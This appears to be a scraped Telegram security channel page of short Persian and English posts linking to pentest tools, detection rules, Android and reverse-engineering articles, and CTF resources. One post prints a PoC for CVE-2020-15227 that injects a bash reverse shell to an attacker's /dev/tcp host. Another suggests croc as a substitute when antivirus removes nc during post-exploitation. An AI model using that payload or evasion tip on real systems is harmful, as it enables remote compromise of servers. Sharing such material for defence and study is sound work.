Security Analysis – Telegram
Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
https://github.com/leoloobeek/COMRunner

A simple COM server which provides a component to run shellcode. Also includes a Windows JScript file to load the COM server and create the object with registration-free activation. This PoC COM server provides an object with a method that takes in base64 encoded shellcode and a method to run the shellcode.

#tools #opensource #shellcode
@securation
Google Chrome for Android (starting from Chrome 85) now support DNS-over-HTTPS (DoH) feature that, when enabled, can automatically switch to DNS-over-HTTPS if your current DNS provider supports it, or users can also provide a custom server address to prevent miscreants from interfering with domain name lookups, eventually stopping network observers, including your ISPs and attackers, from figuring out what sites you visit.
@securation
در بسیاری از موارد به هنگام post exploitation آنتی ویروس سرور مثلا nc را trojan میشناسه و حذفش میکنه !

در این مواقع میشه از موارد مشابه استفاده کرد ، مثال زیر یکی از tool هایی هستش که در این زمینه توسعه داده شده :

https://github.com/schollz/croc

Easily and securely send things from one computer to another
@securation
سایتی برای تبدیل کد‌های زبان‌های مختلف به Instruction با قابلیت انتخاب کامپایلر با نسخه‌های متفاوت.
همچنین با اشاره کردن با موس روی خط مورد نظر از کدتون، Instruction اون تیکه کد مورد نظرتون، با رنگ آبی هایلایت خواهد شد.
لینک سایت: https://godbolt.org

#Reverse_Engineering #مهندسی_معکوس #RE
@securation
Android - SSL-Pinning.pdf
932.3 KB
در این مقاله کوتاه روش بایپس SSL-Pinning اندروید توسط فریمورک Frida نوشته شده رو میتونید بخونید.
#android #frida #ssl_pinning
@securation
در این مقاله مباحثی درباره امنیت مارکت اندرویدی کافه بازار توضیح و تحلیل هایی صورت گرفته از جمله سابقه هک شدن کافه بازار و بدافزارهایی که توسط کافه بازار منتشر میشن ، پیشنهاد میکنم حتما بخونید :

https://virgool.io/@moh53n/%D8%A8%D8%B1%D8%B1%D8%B3%DB%8C-%D8%A7%D9%85%D9%86%DB%8C%D8%AA-%D9%85%D8%A7%D8%B1%DA%A9%D8%AA-%D8%A7%D9%86%D8%AF%D8%B1%D9%88%DB%8C%D8%AF%DB%8C-%DA%A9%D8%A7%D9%81%D9%87-%D8%A8%D8%A7%D8%B2%D8%A7%D8%B1-z2hwghtzo2uo
@securation
UAC bypass (Privilege escalation)

Real Time Detection of User Account Control (UAC) bypass via hijacking The DiskCleanup Scheduled Task

https://github.com/elastic/detection-rules/blob/main/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
#UAC_Bypass
@securation
Hello world 🙂

https://opensource.microsoft.com/

پ ن: خوش اومدید به جمع ما 😁👌
@securation
Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. @securation
CVE-2020-15227 PHP framework nette callback RCE

POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1
@securation
اگه این چند وقت درگیر دوتا آسیب پذیری زیر هستید :
CVE 2020 16898
CVE 2020 1472

این رول snort براش نوشته شده میتونید استفاده کنید :

https://github.com/bhdresh/SnortRules/blob/master/Exploit/CVE-2020-1472.rules
@securation
Threat research:
DOS2RCE - A New Technique to Exploit V8 NULL Pointer Dereference Bug (+ PoC on Chrome ver.77)
https://blog.br0vvnn.io/pages/blogpost.aspx?id=1&ln=0
@securation
رمزگشای باج افزار #MaMoCrypt توسط بیت‌دیفندر منتشر شد. این باج افزار به زبان دلفی نوشته شده و با پکر mpress پک شده.
از اینجا میتونید تولز دیکریپتش رو دانلود کنید:

https://labs.bitdefender.com/2020/10/mamocrypt-ransomware-decryption-tool/
@securation
مهندسی معکوس و آسیب‌پذیری‌های سطح اپلیکیشن و کرنل همیشه جذابیت خودشون رو داشتن، یکی از آسیب‌پذیری‌های جالب Double Fetch می‌باشد. به صورت خیلی خلاصه آسیب‌پذیری Double Fetch زمانی رخ می‌دهد که یک رقابت (از لحاظ زمانی) برای دستیابی به یک دیتا بین دو سطح User-Mode و Kernel-Mode رخ می‌دهد. یکی از زمان‌هایی که امکان مشاهده این آسیب‌پذیری وجود دارد در Threadها است. در این لینک می‌تونید با مثال دقیق‌تر و کاربردی در خصوص این آسیب‌پذیری مطالعه کنید.
#reverse #Double_Fetch
@securation
👍1
این ورکشاپ هک کردن اپلیکیشن اندروید در مسابقات CTF با هدف کشف آسیب پذیری و اکسپلویت کردن آن که چند نمونه از باگ بانتی های هکروان رو هم در خودش جا داده و خیلی فنی کار رو به آخر رسونده رو ببینید.
ویدیو ها:
https://youtu.be/PMKnPaGWxtg
اسلایدهای مرتبط ورکشاپ:
https://docs.google.com/presentation/d/1gK2vYdvwFn8r8dSawIWRRIF4yDF4qmMY2qEelS1M7rI/edit#slide=id
#android #ctf #bug_bounty
@securation
ابزار بروت فورس سریع نهان نگاری, نوشته شده با زبان Rust , ابزار مفیدیه واسه مسابقات CTF

https://github.com/R4yGM/stegbrute
#stegano #ctf
@securation